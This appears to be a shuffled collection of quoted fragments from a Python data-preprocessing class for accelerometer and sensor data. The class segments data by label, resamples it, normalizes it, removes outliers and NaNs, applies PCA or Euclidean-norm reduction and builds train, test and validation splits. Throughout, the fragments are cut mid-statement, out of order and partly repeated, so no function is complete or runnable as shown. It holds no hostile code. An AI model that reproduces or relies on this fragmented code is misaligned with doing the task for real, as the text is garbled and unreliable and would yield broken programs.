replacement_mode, columns,", "reduced = data[columns].sum(axis=1).apply(numpy.abs, axis=1) old_index = data.index data = pandas.concat([data, reduced], axis=1) data", "self.remove_outliers_from_quantitative_data( data_valid, replacement_mode='quantile', columns=selected_columns[:-2], quantile=0.99 # current run @0.95 for classical approach via", "self.segment_data(data_test, mode='labels', label_column='coarse_label', args=selected_coarse_labels) data_test_segments = [] for car_segment in car_test_segments: road_segments =", "= self.znormalize_quantitative_data(data_test, selected_columns[:-2], mean_train, std_train) data_test = self.remove_outliers_from_quantitative_data( data_test, replacement_mode='quantile', columns=selected_columns[:-2], quantile=0.99 #", "= args[2] segments_aggregated = [] split = lambda df, chunk_size : numpy.array_split(df, len(df)", "Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def label_data(self, labels, data): \"\"\" Combines labels vector and", "column in columns: data[column] = encoding_function(data[column]) return data raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError, NotImplementedError,", "data[column].quantile(quantile) ) data[column] = data[column][not_outliers] index_names = data[~not_outliers].index data.drop(index_names, inplace=True) old_index = data.index", "in car_valid_segments: road_segments = self.segment_data(car_segment, mode='labels', label_column='road_label', args=selected_road_labels ) for road_segment in road_segments:", "mode = None): \"\"\" Resamples quantitative data. 
:param data: :param freq: :param mode:", "data_test_segments[ind].set_index('time') data_test_segments[ind] = self.resample_quantitative_data(data_test_segments[ind], freq=freq) #Valid for ind in range(len(data_valid_segments)): data_valid_segments[ind] = data_valid_segments[ind].set_index('time')", "isinstance(column, str) or not isinstance(unit, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) data[column] = pandas.to_datetime(data[column], unit=unit) return", "Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def encode_categorical_features(self, data, mode, columns, encoding_function): \"\"\" Encode categorical", "data_valid_segments[ind].set_index('time') data_valid_segments[ind] = self.resample_quantitative_data(data_valid_segments[ind], freq=freq) print('Dimensionality reduction') #Train for ind in range(len(data_train_segments)): data_train_segments[ind]", "!= len(args): raise TypeError(self.messages.PROVIDED_ARRAYS_DONT_MATCH_LENGTH.value) for ind, column in enumerate(target_columns): data[column] = data[column] -", "# Source for theory behind below calculation # https://en.wikipedia.org/wiki/Quaternions_and_spatial_rotation # https://en.wikipedia.org/wiki/Homogeneous_coordinates # #https://stackoverflow.com/questions/2422750/in-opengl-vertex-shaders-what-is-w-and-why-do-i-divide-by-it", "# https://stackoverflow.com/questions/23282130/principal-components-analysis-using-pandas-dataframe # https://stackoverflow.com/questions/54260920/combine-merge-dataframes-with-different-indexes-and-different-column-names # https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.append.html # https://en.wikipedia.org/wiki/Principal_component_analysis pca = PCA(n_components=1) pca.fit(data[columns]) reduced", "works better than euclidean for motif columns=acelerometer_columns, reduced_column_name='acceleration_abs' ) print('Normalizing, outlier removal') selected_columns", "comment: # 
https://nextjournal.com/schmudde/how-to-remove-outliers-in-data for column in columns: not_outliers = data[column].between( data[column].quantile(1.0 - quantile),", "self.logger.error(traceback.format_exc()) os._exit(2) @overrides def remove_unwanted_labels(self, data, unwanted_labels, replacement_mode): \"\"\" Remove rows that have", "'del_row': return DelRowReplacementStrategy().replace(data, 'unwanted_labels', unwanted_labels) raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1)", "\"\"\" try: if data is None or mode is None or reduced_column_name is", "data: pandas.DataFrame :param params: List :return: pandas.DataFrame, pandas.DataFrame, pandas.DataFrame \"\"\" print('Fetch params') #print(params)", "'sum': return data.resample(freq).sum() except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2)", "== 'mean_estimate_gravity': raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) if mode == 'gyroscope': raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) if mode ==", "data.keys() for column in columns): raise TypeError(self.messages.PROVIDED_ARRAY_DOESNT_MATCH_DATA.value) if columns is not None: data[columns]=(data[columns]-data[columns].min())/(data[columns].max()-data[columns].min())", "= [] split = lambda df, chunk_size : numpy.array_split(df, len(df) // chunk_size +", "raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or not isinstance(column, str) or not isinstance(unit,", "non_sequence = pandas.Series(selected_data.index).diff() != 1 grouper = non_sequence.cumsum().values selected_data_segments = [group for _,", "std is not None: if columns is not None: data[columns] = (data[columns] -", "len(args): raise 
TypeError(self.messages.PROVIDED_ARRAYS_DONT_MATCH_LENGTH.value) # Source for theory behind below calculation # https://en.wikipedia.org/wiki/Quaternions_and_spatial_rotation #", "(TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def remove_nans(self, data,", "center around 0.0 substract 0.5 else: data = (data - data.min()) / (data.max()", "exact_length: for segment in segments: segment.index = pandas.DatetimeIndex(segment.index.astype('datetime64[1s]')) return segments #3. Remove segments", "for next 7 lines of code after comment: # https://nextjournal.com/schmudde/how-to-remove-outliers-in-data for column in", "in min_length_subsegements: segment.index = pandas.DatetimeIndex(segment.index.astype('datetime64[1s]')) return min_length_subsegements #3. Resample and aggregate data segments_combined", ":param data: :return: \"\"\" raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) @overrides def reduce_quantitativ_data_dimensionality(self, data, mode, reduced_column_name =", "try: if data is None or replacement_mode is None or unwanted_labels is None:", "self.reduce_quantitativ_data_dimensionality( data=data, mode=config['feature_eng_dim_reduction_type'], # works better than euclidean for motif columns=acelerometer_columns, reduced_column_name='acceleration_abs' )", "except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def inference_split_process(self,", "self.logger.error(traceback.format_exc()) os._exit(2) @overrides def remove_outliers_from_quantitative_data(self, data, replacement_mode, columns, quantile = None, threshold =", "None or replacement_mode is None or unwanted_labels is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not", "segment.shape[0] == 
segment_length: min_length_subsegements.append(segment) if not aggregate: for segment in min_length_subsegements: segment.index =", "local vehicle coordinates to a global coordinate system. :param data: :param target_columns: :param", "- data.mean()) / data.std() elif mean is not None and std is not", "Resample and aggregate data segments_combined = None for segment in min_length_subsegements: segment =", "https://nextjournal.com/schmudde/how-to-remove-outliers-in-data for column in columns: not_outliers = data[column].between( data[column].quantile(1.0 - quantile), data[column].quantile(quantile) )", "is None: return data.resample(freq).mean() if mode == 'sum': return data.resample(freq).sum() except (TypeError, NotImplementedError,", "or mode is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or not isinstance(mode,", "for column in columns): raise TypeError(self.messages.PROVIDED_ARRAY_DOESNT_MATCH_DATA.value) if mean is None and std is", "is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if replacement_mode ==", "= self.de_segment_data(data_test_segments, selected_columns) data_test, mean_test, std_test = self.znormalize_quantitative_data(data_test, selected_columns[:-2], mean_train, std_train) data_test =", "def remove_nans(self, data, replacement_mode, replacement_value=None): \"\"\" Remove NaNs :param data: :param replacement_mode: string,", "pandas.DatetimeIndex( segments_combined.index.astype('datetime64[1s]')) segments_aggregated.append(segments_combined) return segments_aggregated except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception:", "encoding function. 
:param data: :param mode: :param columns: :param encoding_function: :return: \"\"\" try:", "in selected_data.groupby(grouper)] for segment in selected_data_segments: data_segments.append(segment) return data_segments if mode == 'fixed_interval':", "def project_accelerometer_to_global_coordinates(self, data, target_columns, mode, args=None): \"\"\" Project accelerometer data from local vehicle", "reduced_column_name: :param columns: :return: \"\"\" try: if data is None or mode is", "columns: not_outliers = data[column].between( data[column].quantile(1.0 - quantile), data[column].quantile(quantile) ) data[column] = data[column][not_outliers] index_names", "by labels') #Segment Train car_train_segments = self.segment_data(data_train, mode='labels', label_column='coarse_label', args=selected_coarse_labels) data_train_segments = []", "3 lines after comment: # https://stackoverflow.com/questions/56257329/how-to-split-a-dataframe-based-on-consecutive-index non_sequence = pandas.Series(selected_data.index).diff() != 1 grouper =", "= self.remove_nans(data_test, replacement_mode='del_row') #data_valid = self.remove_nans(data_valid, replacement_mode='del_row') #print(data_train.head(100)) return data_train, mean_train, std_train, data_test,", "segment.index = pandas.DatetimeIndex(segment.index.astype('datetime64[1s]')) segment = self.resample_quantitative_data(segment, freq=\"{}s\".format(segment_length), mode = 'mean') if segments_combined is", "self.logger.error(traceback.format_exc()) os._exit(2) @overrides def remove_nans(self, data, replacement_mode, replacement_value=None): \"\"\" Remove NaNs :param data:", "if columns is not None: data[columns] = (data[columns] - mean) / std else:", "if mode == 'mean' or mode is None: return data.resample(freq).mean() if mode ==", "# works better than euclidean for motif columns=acelerometer_columns, reduced_column_name='acceleration_abs' ) #Test for ind", "for column in columns: not_outliers = data[column].between( 
data[column].quantile(1.0 - quantile), data[column].quantile(quantile) ) data[column]", "vehicle coordinates to a global coordinate system. :param data: :param target_columns: :param mode:", ":param mode: :return: \"\"\" # Source: # https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.resample.html # https://jakevdp.github.io/PythonDataScienceHandbook/03.11-working-with-time-series.html try: if data", "columns: :return: \"\"\" try: if data is None or mode is None or", "self.remove_outliers_from_quantitative_data( data_test, replacement_mode='quantile', columns=selected_columns[:-2], quantile=0.99 # current run @0.95 for classical approach via", "ind in range(len(data_test_segments)): data_test_segments[ind] = self.reduce_quantitativ_data_dimensionality( data=data_test_segments[ind], mode=config['feature_eng_dim_reduction_type'], # works better than euclidean", "segments_aggregated except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def", "= config['pre_proc_movement_type_label'] #[5] selected_road_labels = config['pre_proc_road_type_label'] #[1, 3] freq = config['pre_proc_resample_freq'] #'1000ms' print('Convert", "data[columns].T).T)) reduced = reduced.rename(columns={0:reduced_column_name}) reduced = reduced.reset_index(drop=True) old_index = data.index data = data.reset_index(drop=True)", "isinstance(data, pandas.DataFrame) or not isinstance(column, str) or not isinstance(unit, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) data[column]", "def convert_unix_to_datetime(self, data, column, unit): \"\"\" Converts unix time stamps to date time.", "= config['pre_proc_validation_sz'] #acelerometer_columns = ['acceleration_x', 'acceleration_y', 'acceleration_z'] acelerometer_columns = [config['data_set_column_names'][1:][0], config['data_set_column_names'][1:][1], 
config['data_set_column_names'][1:][2]] selected_coarse_labels", "data[args[3]]) return data raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception:", "mean = data.mean() std = data.std() data = (data - data.mean()) / data.std()", "data, columns=None): \"\"\" Apply min-max-normalization to a data set. :param data: :param columns:", "data is None or mode is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame):", "# current run @0.95 for classical approach via TS Fresh )[:-2] data_train =", "pandas.DataFrame) or not isinstance(unwanted_labels, list) or not isinstance(replacement_mode, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if replacement_mode", "os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def remove_nans(self, data, replacement_mode, replacement_value=None): \"\"\" Remove", "Apply all preprocessing steps necessary for training. 
:param data: pandas.DataFrame :param params: List", "in car_train_segments: road_segments = self.segment_data(car_segment, mode='labels', label_column='road_label', args=selected_road_labels ) for road_segment in road_segments:", "motif columns=acelerometer_columns, reduced_column_name='acceleration_abs' ) #Test for ind in range(len(data_test_segments)): data_test_segments[ind] = self.reduce_quantitativ_data_dimensionality( data=data_test_segments[ind],", "current run @0.95 for classical approach via TS Fresh )[:-2] #Test data_test =", "self.logger.error(traceback.format_exc()) os._exit(2) @overrides def min_max_normalize_quantitative_data(self, data, columns=None): \"\"\" Apply min-max-normalization to a data", "os._exit(2) @overrides def remove_nans(self, data, replacement_mode, replacement_value=None): \"\"\" Remove NaNs :param data: :param", ":param reduced_column_name: :param columns: :return: \"\"\" try: if data is None or mode", "replacement_mode == 'del_row': return DelRowReplacementStrategy().replace(data, 'unwanted_labels', unwanted_labels) raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError, NotImplementedError, ValueError):", "'quantile': # Source for next 7 lines of code after comment: # https://nextjournal.com/schmudde/how-to-remove-outliers-in-data", "for ind in range(len(data_train_segments)): data_train_segments[ind] = data_train_segments[ind].set_index('time') data_train_segments[ind] = self.resample_quantitative_data(data_train_segments[ind], freq=freq) # 8000", "TS Fresh )[:-2] #Test data_test = self.de_segment_data(data_test_segments, selected_columns) data_test, mean_test, std_test = self.znormalize_quantitative_data(data_test,", "std_train) data = self.remove_outliers_from_quantitative_data( data, replacement_mode='quantile', columns=selected_columns, quantile=0.99 # current run @0.95 for", "= [group for _, group in selected_data.groupby(grouper)] for segment in selected_data_segments: 
data_segments.append(segment) return", "0): \"\"\" Desegements as time series. :param data_segments: :param selected_columns: :param axis: :return:", "mode='labels', label_column='coarse_label', args=selected_coarse_labels) data_valid_segments = [] for car_segment in car_valid_segments: road_segments = self.segment_data(car_segment,", "data if replacement_mode == 'threshold': raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError, NotImplementedError, ValueError):", "except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def min_max_normalize_quantitative_data(self, data, columns=None): \"\"\" Apply min-max-normalization to", "Encode categorical features using an encoding function. :param data: :param mode: :param columns:", "is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or not isinstance(column, str) or", "data is None: data = data_segments[ind][selected_columns] else: data = pandas.concat([data, data_segments[ind][selected_columns]], axis=axis) data", ":param data: :param replacement_mode: string, 'mean', 'replacement_val', 'delet_row' :param replacement_value: any type, used", "Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def min_max_normalize_quantitative_data(self, data, columns=None): \"\"\" Apply min-max-normalization to a", "threshold value. 
:param data: :param replacement_mode: :param columns: :param quantile: :param threshold: :return:", "znormalize_quantitative_data(self, data, columns = None, mean = None, std = None): \"\"\" Apply", "for motif columns=acelerometer_columns, reduced_column_name='acceleration_abs' ) #Test for ind in range(len(data_test_segments)): data_test_segments[ind] = self.reduce_quantitativ_data_dimensionality(", "reduced_column_name}) data = data.reset_index(drop=True) data = data.set_index(old_index) return data if mode == 'manhatten':", "numpy.array_split(df, len(df) // chunk_size + 1, axis=0) # 1. Ensure index is datetime", "\"\"\" Converts unix time stamps to date time. :param data: :param column: :param", "= 'reduced', columns = None): \"\"\" Apply a dimensionality reduction technique to a", "# https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.append.html reduced = data[columns].apply(numpy.square, axis=1)[columns].sum(axis=1).apply(numpy.sqrt) #**(1/2) alternative old_index = data.index data =", "data[columns].mean() std = data[columns].std() data[columns] = (data[columns] - data[columns].mean()) / data[columns].std() else: mean", "data_valid_segments[ind] = self.resample_quantitative_data(data_valid_segments[ind], freq=freq) print('Dimensionality reduction') #Train for ind in range(len(data_train_segments)): data_train_segments[ind] =", "- data.min()) # to center around 0.0 substract 0.5 return data except (TypeError,", "Source: # https://thispointer.com/pandas-apply-apply-a-function-to-each-row-column-in-dataframe/ # https://www.google.com/search?client=ubuntu&channel=fs&q=euclidean+norm&ie=utf-8&oe=utf-8 # https://stackoverflow.com/questions/54260920/combine-merge-dataframes-with-different-indexes-and-different-column-names # https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.append.html reduced = data[columns].apply(numpy.square, axis=1)[columns].sum(axis=1).apply(numpy.sqrt)", "= segment.reset_index() segment.index = 
pandas.DatetimeIndex(segment.index.astype('datetime64[1s]')) segment = self.resample_quantitative_data(segment, freq=\"{}s\".format(segment_length), mode = 'mean') if", "is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) for column in columns: data[column] = encoding_function(data[column]) return data", "columns=acelerometer_columns, reduced_column_name='acceleration_abs' ) print('Normalizing, outlier removal') selected_columns = ['acceleration_abs'] data, mean, std =", "https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.append.html reduced = data[columns].apply(numpy.square, axis=1)[columns].sum(axis=1).apply(numpy.sqrt) #**(1/2) alternative old_index = data.index data = pandas.concat([data,", "segments_combined is not None: segments_combined = segments_combined.reset_index() segments_combined.index = pandas.DatetimeIndex( segments_combined.index.astype('datetime64[1s]')) segments_aggregated.append(segments_combined) return", "NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def encode_categorical_features(self, data, mode,", "None, mean = None, std = None): \"\"\" Apply z-normalization to a data", "self.logger.error(traceback.format_exc()) os._exit(2) @overrides def resample_quantitative_data(self, data, freq, mode = None): \"\"\" Resamples quantitative", "data = self.convert_unix_to_datetime(data, column = 'time', unit = 'ms') data = self.label_data(data, labels)", "segment in segments: if segment.shape[0] == segment_length: min_length_subsegements.append(segment) if not aggregate: for segment", "using an encoding function. 
:param data: :param mode: :param columns: :param encoding_function: :return:", "@overrides def re_represent_data(self, current_representation, target_representation, data): \"\"\" Change representation of a data set.", "List :return: pandas.DataFrame, pandas.DataFrame, pandas.DataFrame \"\"\" print('Fetch params') #print(params) labels = labels test_sz", "or reduced_column_name is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or not isinstance(mode,", "def remove_unwanted_labels(self, data, unwanted_labels, replacement_mode): \"\"\" Remove rows that have an unwanted label.", "0.5 else: data = (data - data.min()) / (data.max() - data.min()) # to", "selected_data.groupby(grouper)] for segment in selected_data_segments: data_segments.append(segment) return data_segments if mode == 'fixed_interval': segment_length", ":param columns: :param quantile: :param threshold: :return: \"\"\" try: if data is None", "== 'custom_function': if encoding_function is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) for column in columns: data[column]", "remove nans') data = self.convert_unix_to_datetime(data, column = 'time', unit = 'ms') data =", "selected_columns = ['acceleration_abs', 'road_label', 'id'] # 'acceleration_abs' data_train = self.de_segment_data(data_train_segments, selected_columns) data_train, mean_train,", "= self.segment_data(data_train, mode='labels', label_column='coarse_label', args=selected_coarse_labels) data_train_segments = [] for car_segment in car_train_segments: road_segments", ":param std: :return: \"\"\" try: if data is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not", "data, columns = None, mean = None, std = None): \"\"\" Apply z-normalization", ":return: \"\"\" try: if data is None or replacement_mode is None or columns", "= [config['data_set_column_names'][1:][0], config['data_set_column_names'][1:][1], 
config['data_set_column_names'][1:][2]] selected_coarse_labels = config['pre_proc_movement_type_label'] #[5] selected_road_labels = config['pre_proc_road_type_label'] #[1, 3]", "None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or not isinstance(unwanted_labels, list) or not", "segment.index = pandas.DatetimeIndex(segment.index.astype('datetime64[1s]')) return segments #3. Remove segments that are too long or", "data = data.set_index(old_index) return data if mode == 'pca': # Source: # https://stackoverflow.com/questions/23282130/principal-components-analysis-using-pandas-dataframe", "# 'acceleration_abs' data_train = self.de_segment_data(data_train_segments, selected_columns) data_train, mean_train, std_train = self.znormalize_quantitative_data(data_train, selected_columns[:-2]) data_train", "return DelRowReplacementStrategy().replace(data, 'unwanted_labels', unwanted_labels) raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except", "# Source: # https://thispointer.com/pandas-apply-apply-a-function-to-each-row-column-in-dataframe/ # https://www.google.com/search?client=ubuntu&channel=fs&q=euclidean+norm&ie=utf-8&oe=utf-8 # https://stackoverflow.com/questions/54260920/combine-merge-dataframes-with-different-indexes-and-different-column-names # https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.append.html reduced = data[columns].apply(numpy.square,", "for ind, column in enumerate(target_columns): data[column] = data[column] * (data[args[ind]] / data[args[3]]) return", "ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def znormalize_quantitative_data(self, data, columns =", "= data.reset_index(drop=False) data = data.set_index(old_index) return data if 
replacement_mode == 'threshold': raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value)", "config['pre_proc_training_sz'] valid_sz = config['pre_proc_validation_sz'] #acelerometer_columns = ['acceleration_x', 'acceleration_y', 'acceleration_z'] acelerometer_columns = [config['data_set_column_names'][1:][0], config['data_set_column_names'][1:][1],", "label_column: :param args: :return: \"\"\" try: if data is None or mode is", "time series based on a label column, semantic segementation of a fixed interval.", "= pandas.DatetimeIndex(segment.index.astype('datetime64[1s]')) segment = self.resample_quantitative_data(segment, freq=\"{}s\".format(segment_length), mode = 'mean') if segments_combined is None:", "std_train) data_test = self.remove_outliers_from_quantitative_data( data_test, replacement_mode='quantile', columns=selected_columns[:-2], quantile=0.99 # current run @0.95 for", "'road_label', 'id'] # 'acceleration_abs' data_train = self.de_segment_data(data_train_segments, selected_columns) data_train, mean_train, std_train = self.znormalize_quantitative_data(data_train,", "#Test for ind in range(len(data_test_segments)): data_test_segments[ind] = self.reduce_quantitativ_data_dimensionality( data=data_test_segments[ind], mode=config['feature_eng_dim_reduction_type'], # works better", "TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not (isinstance(data, pandas.DataFrame) and isinstance(labels, pandas.DataFrame)): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if (len(labels) !=", "- data[columns].mean()) / data[columns].std() else: mean = data.mean() std = data.std() data =", ":param data: :param column: :param unit: :return: \"\"\" # Source: # https://stackoverflow.com/questions/19231871/convert-unix-time-to-readable-date-in-pandas-dataframe #", "= pandas.DatetimeIndex(data.index.astype('datetime64[1s]')) #2. Segment data segments = split(data, segment_length) if not exact_length: for", "as time series. 
:param data_segments: :param selected_columns: :param axis: :return: \"\"\" try: data", "def training_split_process(self, data, config, labels): \"\"\" Apply all preprocessing steps necessary for training.", "to date time. :param data: :param column: :param unit: :return: \"\"\" # Source:", "axis=1)[columns].sum(axis=1).apply(numpy.sqrt) #**(1/2) alternative old_index = data.index data = pandas.concat([data, reduced], axis=1) data =", "index and standardize type data.index = pandas.DatetimeIndex(data.index.astype('datetime64[1s]')) #2. Segment data segments = split(data,", "isinstance(data, pandas.DataFrame) or not isinstance(unwanted_labels, list) or not isinstance(replacement_mode, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if", "selected_columns: :param axis: :return: \"\"\" try: data = None for ind in range(len(data_segments)):", "\"\"\" Remove rows that have an unwanted label. :param data: :param unwanted_labels: :param", "@overrides def convert_unix_to_datetime(self, data, column, unit): \"\"\" Converts unix time stamps to date", "pandas.DataFrame \"\"\" print('Fetch params') #print(params) labels = labels test_sz = config['pre_proc_test_sz'] train_sz =", "= 'ms') data = self.label_data(data, labels) data = self.remove_nans(data, replacement_mode='del_row') print('Train, Test, Validation", "TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if replacement_mode == 'mean': return MeanReplacementStrategy().replace(data, 'NaN') if replacement_mode == 'del_row': return", "(data - mean) / std else: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) return data, mean, std except", "= labels test_sz = config['pre_proc_test_sz'] train_sz = config['pre_proc_training_sz'] valid_sz = config['pre_proc_validation_sz'] #acelerometer_columns =", "current run @0.95 for classical approach via TS Fresh )[:-2] #Valid data_valid =", "run @0.95 for classical approach via TS Fresh )[:-2] data_train = data_train.loc[:, 
~data_train.columns.duplicated()]", "or not isinstance(column, str) or not isinstance(unit, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) data[column] = pandas.to_datetime(data[column],", "from local vehicle coordinates to a global coordinate system. :param data: :param target_columns:", "import MeanReplacementStrategy from pipeline.feature_engineering.preprocessing.replacement_strategies.del_row_replacement_strategy import DelRowReplacementStrategy from pipeline.feature_engineering.preprocessing.replacement_strategies.replacement_val_replacement_strategy import ReplacementValReplacementStrategy from overrides import", "for classical approach via TS Fresh )[:-2] #Valid data_valid = self.de_segment_data(data_valid_segments, selected_columns) data_valid,", "a threshold value. :param data: :param replacement_mode: :param columns: :param quantile: :param threshold:", "of code after comment: # https://nextjournal.com/schmudde/how-to-remove-outliers-in-data for column in columns: not_outliers = data[column].between(", "segments_combined = None for segment in min_length_subsegements: segment = segment.reset_index() segment.index = pandas.DatetimeIndex(segment.index.astype('datetime64[1s]'))", "not isinstance(replacement_mode, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if replacement_mode == 'del_row': return DelRowReplacementStrategy().replace(data, 'unwanted_labels', unwanted_labels)", "self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def re_represent_data(self, current_representation, target_representation, data): \"\"\"", "data.keys() for column in columns): raise TypeError(self.messages.PROVIDED_ARRAY_DOESNT_MATCH_DATA.value) if mean is None and std", ")[:-1] return data @overrides def training_split_process(self, data, config, labels): \"\"\" Apply all preprocessing", "segments_combined is None: segments_combined = segment else: 
segments_combined = pandas.concat([segments_combined, segment], axis=0) if", "std_train = meta_data['std_train'] print('Convert time unit, remove nans') data = self.convert_unix_to_datetime(data, column='time', unit='ms')", "else: segments_combined = pandas.concat([segments_combined, segment], axis=0) if segments_combined is not None: segments_combined =", "not isinstance(column, str) or not isinstance(unit, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) data[column] = pandas.to_datetime(data[column], unit=unit)", "data = (data - mean) / std else: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) return data, mean,", "an unwanted label. :param data: :param unwanted_labels: :param replacement_mode: :return: \"\"\" try: if", "time series. :param data_segments: :param selected_columns: :param axis: :return: \"\"\" try: data =", "data[args[ind]] return data if mode == 'orientation': if len(target_columns)+1 != len(args): raise TypeError(self.messages.PROVIDED_ARRAYS_DONT_MATCH_LENGTH.value)", "data: :param column: :param unit: :return: \"\"\" # Source: # https://stackoverflow.com/questions/19231871/convert-unix-time-to-readable-date-in-pandas-dataframe # https://stackoverflow.com/questions/42698421/pandas-to-datetime-from-milliseconds-produces-incorrect-datetime", "self.znormalize_quantitative_data(data_train, selected_columns[:-2]) data_train = self.remove_outliers_from_quantitative_data( data_train, replacement_mode='quantile', columns=selected_columns[:-2], quantile=0.99 # current run @0.95", "PCA import numpy class SussexHuaweiPreprocessor(Preprocessor): def __init__(self): super().__init__() @overrides def segment_data(self, data, mode,", "= None for segment in min_length_subsegements: segment = segment.reset_index() segment.index = pandas.DatetimeIndex(segment.index.astype('datetime64[1s]')) segment", "TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or not isinstance(mode, str) or 
not isinstance( columns,", "= 'mean') if segments_combined is None: segments_combined = segment else: segments_combined = pandas.concat([segments_combined,", "#Segment Valid car_valid_segments = self.segment_data(data_valid, mode='labels', label_column='coarse_label', args=selected_coarse_labels) data_valid_segments = [] for car_segment", "columns is not None: data[columns]=(data[columns]-data[columns].min())/(data[columns].max()-data[columns].min()) # to center around 0.0 substract 0.5 else:", "or replacement_mode is None or unwanted_labels is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data,", "resample_quantitative_data(self, data, freq, mode = None): \"\"\" Resamples quantitative data. :param data: :param", "return data if mode == 'orientation': if len(target_columns)+1 != len(args): raise TypeError(self.messages.PROVIDED_ARRAYS_DONT_MATCH_LENGTH.value) #", "Project accelerometer data from local vehicle coordinates to a global coordinate system. :param", "axis: :return: \"\"\" try: data = None for ind in range(len(data_segments)): if data", "freq is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or not isinstance(freq, str):", "after splitting min_length_subsegements = [] for segment in segments: if segment.shape[0] == segment_length:", "data_segments: :param selected_columns: :param axis: :return: \"\"\" try: data = None for ind", "\"\"\" Apply z-normalization to a data set. 
